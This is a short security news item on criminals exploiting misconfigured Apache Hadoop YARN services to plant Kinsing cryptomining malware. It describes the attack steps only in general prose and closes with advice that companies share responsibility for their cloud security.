Apache Hadoop Yarn is a technology for cluster management. We also use this technology for executing. It is a part of the Hadoop framework and some recent analysis reports suggest that cybercriminals are trying to exploit the misconfiguration in the Apache Hadoop YARN.
To exploit the framework, the researchers observed that the cybercriminals deployed crypto-malware in the YARN service. The researchers said that this compromise in the Apache Hadoop YARN introduces a great amount of risk in security. The hackers steal credentials and information and to increase their rate of success, they attack as many systems as possible.
The tools and techniques used by the hackers to exploit the flaws in the service are-
- The vulnerable services get attacked by commands via an HTTP POST request. The YARN gets the command from the attacker and creates launch scripts.
- After execution of the scripts, remote scripts get downloaded which deploys Kinsing Malware.
- They also try to spot any kind of vulnerable services using the port scanning tool.
The researchers suggest that the attacker’s main goal is to disable the protection systems offered by the cloud service. The cloud service provider does not have the sole duty of maintaining the security of the company. The companies that use such third-party systems should also set up, maintain, and upgrade their security systems to keep their data safe.